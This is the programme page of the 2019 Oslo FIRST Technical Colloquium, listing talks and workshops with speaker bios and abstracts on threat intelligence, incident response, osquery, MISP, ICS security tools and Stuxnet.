Program Overview

Oslo 2019 FIRST Technical Colloquium

This is a working draft agenda. Agenda is subject to change.

• 2 Tales and Their not so Happy Endings

  Frans van Ierland (Splunk)

  Frans started his career in the 80s working on a lot of stuff related to security. At that time there was no such thing as an internet of things. We did not even have the internet during those days, and things where limited to a set of tools and hardware. But we did have threats, as they have always been around. This is why Frans decided to help customers stay in control in relationship to Cyber Threats and Security related issues, building tools and developing frameworks to get things done! Frans now serves customers at Splunk in the role of Security Specialist, working with the largest customers, agencies and people who just love get catch the bad guys.

  A loong, long time ago there lived an evil thief in a dark underworld…" This is how it normally starts. But in fact, it’s not a long time ago. It's now! As the future is now! Those guys are still around and often more sophisticated than 2 weeks ago. Yep - this is how fast things evolve. By the way, they are well organized and play games in a very professional way. You all know that the game is changing each day and we hardly get a change to educate ourselves against what’s coming. Therefore, we like to take the opportunity to tell you our tails around the good, the bad and the real ugly attacks. And how we were helped by our assistant AS a.k.a Analytic stories:

  Key takeaways:

  • Insights on where to look and what to look for
  • How stories and frameworks can help
  • Stories around real life scenarios seen at our customers

  October 16, 2019 14:25-15:25

• An APT’s Revenge: How Attackers Respond to Disclosure

  Saher Naumaan (BAE Systems)

  Saher Naumaan is a Threat Intelligence Analyst at BAE Systems Applied Intelligence. She currently researches state-sponsored cyber espionage with a focus on threat groups and activity in the Middle East. Saher specialises in analysis covering the intersection of geopolitics and cyber operations, and regularly speaks at public and private conferences around the world, including SAS, Virus Bulletin, and Bsides. Prior to working at Applied Intelligence, Saher graduated from King’s College London with a Master’s in Intelligence and Security, where she received the Barrie Paskins Award for Best MA dissertation in War Studies.

  Government and industry have invested significant effort in understanding the threat landscape in order to defend their interests in cyberspace, but the issue of how defensive action can influence attacker behaviour is poorly understood. This presentation seeks to explore the question: how do attackers respond to investigation into their operations? We will review the ‘spectrum’ of response options and changes that attackers have made to their operations following incident response cases and public reporting (and attribution) of specific groups. Responses range from defensive (‘go quiet’) to aggressive (threats or targeting of researchers), and include a multitude of change-ups in tactics, techniques, and procedures in between. This analysis will draw on evidence from numerous examples both from our investigations and cases from open sources to cover high priority threat groups faced by the public and private sectors as well as unintended consequences of disclosure and thoughts from a defender perspective.

  October 17, 2019 11:45-12:30

•  NO

  Applying Threat Events to the IRT Process

  Per Morten SandstadOve Nærø (Mnemonic, NO), Per Morten Sandstad (Mnemonic, NO)

  Ove Nærø has since June 2018 been working in mnemonic's Threat Intelligence group as a tactical analyst. He has more than 15 years’ experience dealing with incident response across multiple business verticals, such as finance and health care. Ove has been working with threat intelligence on both a strategic and on a tactical and operational level.
  

  Per Morten Sandstad works in mnemonic's Threat Intelligence group as an analyst. He has more than ten years' experience with incident response and threat intelligence. Before joining mnemonic in September 2018 he was the first hire into establishing FinansCERT Norge (now Nordic Financial CERT), where he headed up the threat intelligence work and focused on supporting the financial industry and their incident response teams.

  This talk will provide a view of how to use threat events in responding to security incidents. In this context are threat events the different courses of action the threat actors may pursue to fulfil their desired end-state. Threat events describe various ways threat actors may negatively affect a victim organization. Each threat actor may initiate several threat events that are either unique or resemble those of other threat actors. Ove and Per Morten will go into how using these threat events and analytic processes, as Analysis of Competing Hypotheses (ACH), to answer critical questions in the IRT process and prioritize tasks.

  October 17, 2019 14:50-15:20

•  US

  Attack Patterns for Analytics and Machine Learning Applications

  Shane McElligott (Cisco, US)

  Shane has nearly 20 years of experience, with the majority of it being at IBM and Cisco Systems. He is a seasoned Data Scientist and AI Developer with a background in network and cloud security. He has experience consulting for businesses of diverse scope and scale; governments and NGOs; health care, academia and scientific research initiatives. Shane is a holder of several patents in the AI, robotics, cloud and security domains. A dual-citizen of the Republic of Ireland and the US, Shane is passionate about creating data privacy-enhancement technology as well as building and advocating for foundational security and ethics solutions within the data science and AI domains.

  Privacy Attacks and Differential Privacy, Machine Learning Attacks and Defenses, Challenges, Exploring CVSS Interpretations for ML Vulnerabilities, Where to Learn More

  October 16, 2019 13:15-14:15
•  SE

  BAS5 - A collection of open source security tools

  Christian Sundberg (Swedish Civil Contingencies Agency (MSB), SE)

  Christian Sundberg works as part of the Critical Information Infrastructure Protection Section at the Swedish Civil Contingencies Agency (MSB). This section provides advice and support, offering technical training and other support to achieve a societal impact in reducing the vulnerabilities of cyberphysical systems. He has 15 years of experience with IT and OT within the energy sector where he worked with SCADA/ICS-systems as an automation engineer and also several years with information system management.

  AS5 is a collection of software tools that help operators of industrial information and control systems improve their information and cyber security. The purpose of BAS5 is to raise the level of security of those operators who, for financial or other reasons, do not have the opportunity to obtain technical protection mechanisms. Through BAS5, they give operators access to basic protection in their ICS and SCADA environments and tools to easily and quickly get started with security-enhancing measures.

  October 16, 2019 11:45-12:15

• Critical Design Errors in Business Critical Systems: One Disclosure, Two Stories

  Bjarne Rasmussen (Broadcom), Hans-Petter Fjeld

  Bjarne Rasmussen is currently CTO, EMEA Enterprise in Broadcom and has 20 years of experience from different leader roles in CA Technologies.

  Hans-Petter is a senior Information Security Engineer at the leading Norwegian managed hosting provider Basefarm. he does operations of security solutions provided, incident handling, forensics, vulnerability assessments, pentests and is an all-round blue-team member.

  This is the story of CVE-2018-13819, -13820 and -13821, lessons learned during vulnerability disclosure and the path to mitigating a central design error. Mistakes were made, and acting etichally is discovered to be a moving target. Broadcom joins the presentation to give their perspective as the receiving end of the disclosure.

  October 17, 2019 10:50-11:35

• Data, Machine Learning and Security

  Alan Saied (Visma)

  Alan is passionate about Security in the context of Machine Learning and Artificial Intelligence. He spends most of his time learning about different data behavioral cases where Machine Learning can be applied. Alan holds a PhD in Computer Security from King's College in London.

  Data is the fundamental backbone of any business and the ability to mathematically "use data to protect data" is going to be the core focus of the talk. In this presentation, we explain how Machine Learning algorithms and data analytics can be used to identify abnormal patterns within complex environments. This will further be followed by its complications in terms of false positives, accuracy of detection and its validity.

  October 16, 2019 15:35-16:20
•  NO

  Fighting APTs: How TCERT Geared Up to Face Them

  Henrik Strøm (Telenor CERT, NO), Julie Dahl (Telenor CERT, NO), Mona Elisabeth Østvang (Telenor CERT, NO)

  Henrik Strøm has over 25 years of experience in the cyber security field. In the early 90s, when anti-virus was a bleeding edge technology, he spent his time at the Norwegian University of Science and Technology (NTNU) developing his own award winning anti-virus software. He then moved to Oslo and worked for Telia and Norsk Hydro, and finally Telenor where he was involved in the emergence of Internet and "Cyberspace" in Norway. Henrik has worked in various key security positions in Telenor for over a decade, and is now heading the newly re-focused Telenor CERT. His team at Telenor CERT is currently working on establishing global CERT and SOC operations for Telenor ASA, which own 9 telecommunications companies globally.
  
  

  Julie works with incident response in TCERT and has several years of experience working with security in Telenor. She has a background as a consultant specializing in both big data and security, and has been part of a larger project working to establish better capability for security monitoring in Telenor’s networks and systems for three years. She has a master’s degree in computer science from NTNU.
  
  

  Mona Elisabeth Østvang works as an incident manager in TCERT. Before joining TCERT this year, she work as a consultant in mnemonic, and has for the past six years, led investigations and handled a number of major events, including advanced and targeted attacks against Norwegian and foreign targets. She holds a master of technology from the Norwegian University of Science and Technology (NTNU) from 2004.
  

  TCERT was established as a department in Telenor Norway security in 2015. The given mandate was to improve Telenor Norway's detection capabilities, as well as responding to nation state actors targeting our networks. A couple of years in, the mandate was expanded to also include Telenor Group Business Units globally. In this presentation we will share how we have set up our organization, some of the tools we are using, and some lessons learned along the way, supported by real life examples.

  October 17, 2019 15:25-15:55

•  NO

  Operational Security Failures

  Jon Røgeberg (mnemonic, NO)

  Jon Røgeberg works as the manager for mnemonic’s Threat Intelligence group. He is also the Operational Manager of virtual mnemonic IRT and responsible for the forensics services in mnemonic. He has more than 10 years’ experience with incident response dealing with incidents ranging from virus outbreaks, opportunistic crime, targeted crime and advanced targeted attacks.

  This talk will provide advice for maintaining operational security (op-sec) while investigating incidents and performing threat intelligence. Jon will show examples of what to take into consideration, exemplified by op-sec failures when ignoring these precautions. To spice it up, he will show how the adversaries from time to time mess up and fail miserably in their op-sec.

  October 17, 2019 13:15-14:00

•  US

  osquery: A Comprehensive Approach to CSIRT Analytics

  Milan Shah (Uptycs, US)

  Milan Shah, is a serial entrepreneur with a track record of building and leading cutting edge cybersecurity technology companies. Prior to co-founding Uptycs, Milan was SVP of Products and Engineering at Core Security, where he formulated a vision for a new class of automated pen testing solutions. Milan has also served as VP of Engineering at CA Technologies and IMlogic, which was successfully acquired by Symantec. The first part of his career was spent as a member of the early Windows NT development team, and he was a key architect of Microsoft Exchange. Milan holds a Masters in EECS degree from MIT, and a Bachelors in EECS from University of Illinois, Urbana.

  Speed to detection and the ability to provide a comprehensive view of breached systems are the bread and butter of modern CSIRTs. However, access to a reliable, comprehensive and consolidated view of system data can often be a frustrating barrier to reducing dwell time and activating remediation and communication plans.

  Osquery, an open source universal endpoint agent, is changing the game for CSIRTs, providing access to a data set inclusive of 100’s of system attributes across operating systems (incl. macOS, Linux), containers and cloud workloads. Combining osquery with a purpose-built analytics backend for storage further enhances the value for incident investigation, offering the ability to lookback historically and understand not just the event, but the context of that event (userid, machine, time, and activity).

  Join this session to explore how osquery is offering a modern and comprehensive approach to CSIRT analytics. We’ll explore specific case studies/production use cases to highlight how osquery’s unique combination of context and event data helps speed up incident investigation practices.

  Attendees of this session will gain an understanding of:

  • How osquery works, what data it collects, and how that data can be used
  • Key considerations & tooling needed for a DIY osquery deployment
  • How osquery would fit into a comprehensive IR capability (integration with existing tooling, required skills, etc)
  • How Uptycs reduces the time and costs associated with deploying osquery at scale

  October 16, 2019 10:50-11:35

•  US

  Stuxnet and Beyond: The Age of Digital Warfare

  Kim Zetter (US)

  Kim Zetter is an award-winning journalist and author who har been covering cybersecurity and national security for two decades. She wrote for WIRED for a decade and more recently for the New York Times Magazine, the Washington Post, Politico, Motherboard, and other publications. She has four times been voted one of the top ten journalists in the U.S. by her peers and industry professionals and har broken numerous stories over the years about NSA surveillance, WikiLeaks and Chelsea Manning, the election security, and the hacker underground. She was among the first journalists to cover Stuxnet after its discovery and published a widely acclaimed book on the topic – Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon.

  It's been ten years since Stuxnet was discovered in June 2010-- the landmark of digital weapon that marked the age of cyber warfare. But the code's legacy lives on with its means and methods reproduced in other nation-state and criminal attacks launched since then. Recently, one og the long-enduring mysteries of Stuxnet was solved, revealing for the first time how the U.S. and Israel got the destructive code onto air-gapped and heavily guarded machines in the Iranian plant at Natanz. Kim Zetter, Long-time journalist covering cybersecurity and national security and the author of the most comprehensive book about Stuxnet-- Countdown to Zero Day-- will tell the story of the code: the planning, execution and discovery and describe the details of the attack that made Stuxnet so unique and sophisticated. She'll also discuss the implications and repercussions of the assault and the industrial attacks that have followed since Stuxnet opened the door to digital destruction.

  October 17, 2019 09:40-10:40

•  LU

  Turning data into actionable intelligence - advanced features in MISP supporting your analysts and tools

  Andras IklodyAndras Iklody (CIRCL, LU)

  Andras Iklody is a software developer working for CIRCL and has been the main developer of the MISP core since the beginning of 2013. He is a firm believer that there are no problems that cannot be tackled by building the right tool. He did the overall development governance in the MISP core project especially to ensure external contributions are inline with the overall objective of the MISP core functionalities.

  As we, as the CSIRT community, mature, our needs for having the ability to extract more value and context from our data becomes more and more vital. MISP has been gradually expanded to reflect these needs, by incorporating features that ease indicator life cycle management, contextualisation and management of threat intelligence, collaboration and the filtered feeding of our collected data to our various protective tools. This talk aims to highlight some of the techniques we use via the platform

  October 16, 2019 09:40-10:40
•  NO

  Unrealistic Exercises Only Renders You Good at Exercising

  Margrete Raaum (KraftCERT, NO)

  Margrete Raaum is CEO for KraftCERT, the Norwegian CERT for energy, water&waste water and industrial control system industry. She has a background from IC design, computer networking and information security. She has woken with information security since 1998; for the ISP community, in academia, the Norwegian Security Authority, NorCERT and the grid- and transmission system operator. She was on the board of directors of FIRST (The Forum for Incident Response and Security Teams) for 8 years, serving as a chairman for 2 of these.

  While the management play decision games, the techies are bored. And while the techies solve the puzzles, billions in lost management hours are spent waiting. What to do?

  October 17, 2019 14:10-14:40

•  US

  Workshop: Cross-Platform Incident Investigation with MITRE ATT&CK Framework & osquery

  Milan Shah (Uptycs, US)

  Milan Shah, is a serial entrepreneur with a track record of building and leading cutting edge cybersecurity technology companies. Prior to co-founding Uptycs, Milan was SVP of Products and Engineering at Core Security, where he formulated a vision for a new class of automated pen testing solutions. Milan has also served as VP of Engineering at CA Technologies and IMlogic, which was successfully acquired by Symantec. The first part of his career was spent as a member of the early Windows NT development team, and he was a key architect of Microsoft Exchange. Milan holds a Masters in EECS degree from MIT, and a Bachelors in EECS from University of Illinois, Urbana.

  There's a disconnect between best practice frameworks and real-life nitty gritty. While many frameworks broadly approach the overarching principles that a robust security program should encompass, and why these principles are important, MITRE does an impressive job of taking it a step further and connecting the dots to detail specifically what kind of attacker behavior a defender should anticipate, and how an attacker would work to thwart those vaulted best practices.

  Using Osquery, an open-source universal endpoint agent that makes our macOS, Linux, Docker, and Windows environments queryable using SQL, we can begin to harden our defenses by writing and deploying queries that identify those known behaviors as outlined in the twelve attack technique categories mapped by MITRE.

  Security and incident response managers and engineers should attend this hands-on workshop to:

  • Gain an understanding of what osquery is, how it structures data & how that data can be used across security teams
  • Deploy osquery to a virtual environment, create SQL queries to solve for provided scenarios, and get acquainted with the data and insight osquery provides
  • Map portions of the ATT&CK matrix to SQL queries, using osquery to observe for these activities
  • All attendees will leave with a referenceable document inclusive of the optimized SQL queries, which element of the MITRE ATT&CK framework they identify, and an explanation of how the query works/what it is looking for.

  October 15, 2019 12:00-15:00

•  LU

  Workshop: MISP Training - Threat Intelligence Analyst and Administration

  Andras IklodyAndras Iklody (CIRCL, LU)

  Andras Iklody is a software developer working for CIRCL and has been the main developer of the MISP core since the beginning of 2013. He is a firm believer that there are no problems that cannot be tackled by building the right tool. He did the overall development governance in the MISP core project especially to ensure external contributions are inline with the overall objective of the MISP core functionalities.

  In a continuous effort since 2016, CIRCL frequently gives training sessions about MISP. The purpose is to reach out to security analysts using MISP as a threat intelligence platform along with users using it as an information sharing platform. This is an opportunity for the users to meet the developers and exchange about potential improvements or use-cases using MISP as a threat-intelligence platform.

  The MISP training will demonstrate how the platform functions; explain how to share, comment and contribute data, and describe the future developments. This part of the training focuses on the analyst aspect along with the management of your own MISP instance especially how to connect to other MISP communities.

  October 15, 2019 09:00-16:00

• Oslo 2019 FIRST Technical Colloquium
  • Program Overview
  • Registration
  • Hotel Information
  • Travel Information